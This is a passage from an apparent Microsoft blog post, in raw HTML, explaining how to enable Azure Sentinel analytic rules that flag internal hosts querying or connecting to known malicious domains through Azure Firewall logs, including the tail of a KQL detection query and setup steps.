Action:' Action | where isnotempty(DestinationHost) | where DestinationHost has_any (domains) | extend DNSName = DestinationHost | extend IPCustomEntity = SourceHost ) )</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <OL start="3"> <LI>When this rule query is executed (based on its schedule), it will analyze logs from all the data sources defined in the query, which also include the Azure Firewall DNS Proxy and Application Rule logs.&nbsp; The result will identify hosts in the internal network which attempted to query/connect to one of the malicious domains which were declared in Step 1</LI> </OL> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Instructions to Configure Azure Firewall Detections in Sentinel</H2> <P>&nbsp;</P> <P>These detections are available as Analytic Rules in Azure Sentinel and can be quickly deployed by following the steps below.</P> <P>&nbsp;</P> <OL> <LI>Open the <STRONG>Azure Sentinel</STRONG> blade in the Azure Portal</LI> <LI>Select the Sentinel workspace where you have the Azure Firewall logs</LI> <LI>Select <STRONG>Analytics</STRONG> blade and then click on <STRONG>Rule templates</STRONG></LI> <LI>Under <STRONG>Data Sources,</STRONG> filter by <STRONG>Azure Firewall</STRONG></LI> <LI>Select the Rule template you want to enable and click <STRONG>Create rule&nbsp;</STRONG>and configure rule settings to create a rule</LI> </OL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Create_Sentinel_Rule_For_AzFirewall2.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/268283iB1B8009EEC819295/image-size/large?v=v2&amp;px=999" role="button" title="Create_Sentinel_Rule_For_AzFirewall2.gif" alt="Steps to Configure Azure Firewall Rules in Azure Sentinel" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Steps to Configure Azure Firewall Rules in Azure Sentinel</span></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Summary</H2> <P>&nbsp;</P> <P>Azure 
Firewall logs can help identify patterns of malicious activity and Indicators of Compromise (IOCs) in the internal network.&nbsp; Built-in Analytic Rules in Azure Sentinel provide a powerful and reliable method for analyzing these logs to detect traffic representing IOCs in your network.&nbsp; With added support for Azure Firewall to these detections, you can now easily detect malicious traffic patterns traversing through Azure Firewall in your network which allows you to rapidly respond and remediate the threats.&nbsp; We encourage all customers to utilize these new detections to help improve your overall security posture.</P> <P>&nbsp;</P> <P>As new attack scenarios surface and associated detections are created in future, we will evaluate them and add support for Azure Firewall or other Network Security products, where applicable.&nbsp; You can also contribute new connectors, detections, workbooks, analytics and more for Azure Firewall in Azure Sentinel. Get started now by joining the <A href="#" target="_blank" rel="noopener">Azure Network Security</A> plus <A href="#" target="_blank" rel="noopener">Azure Sentinel Threat Hunters</A> communities on GitHub and following the guidance.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2><SPAN>Additional Resources</SPAN></H2> <P>&nbsp;</P> <UL> <LI>To learn more about Azure Firewall, visit: &nbsp;<A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/firewall</A></LI> <LI>To learn more about Azure Sentinel, visit: &nbsp;<A href="#" target="_blank" rel="noopener">http://aka.ms/ninjatraining</A></LI> </UL> <H2>&nbsp;</H2> <P>&nbsp;</P> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: 
initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: 
initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: 
initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: 
initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: 
initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: 
initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; 
backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: 
initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; 
-webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: 
initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; 
origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; 
-webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; 
border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; 
outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; 
-webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: 
initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: 
initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; 
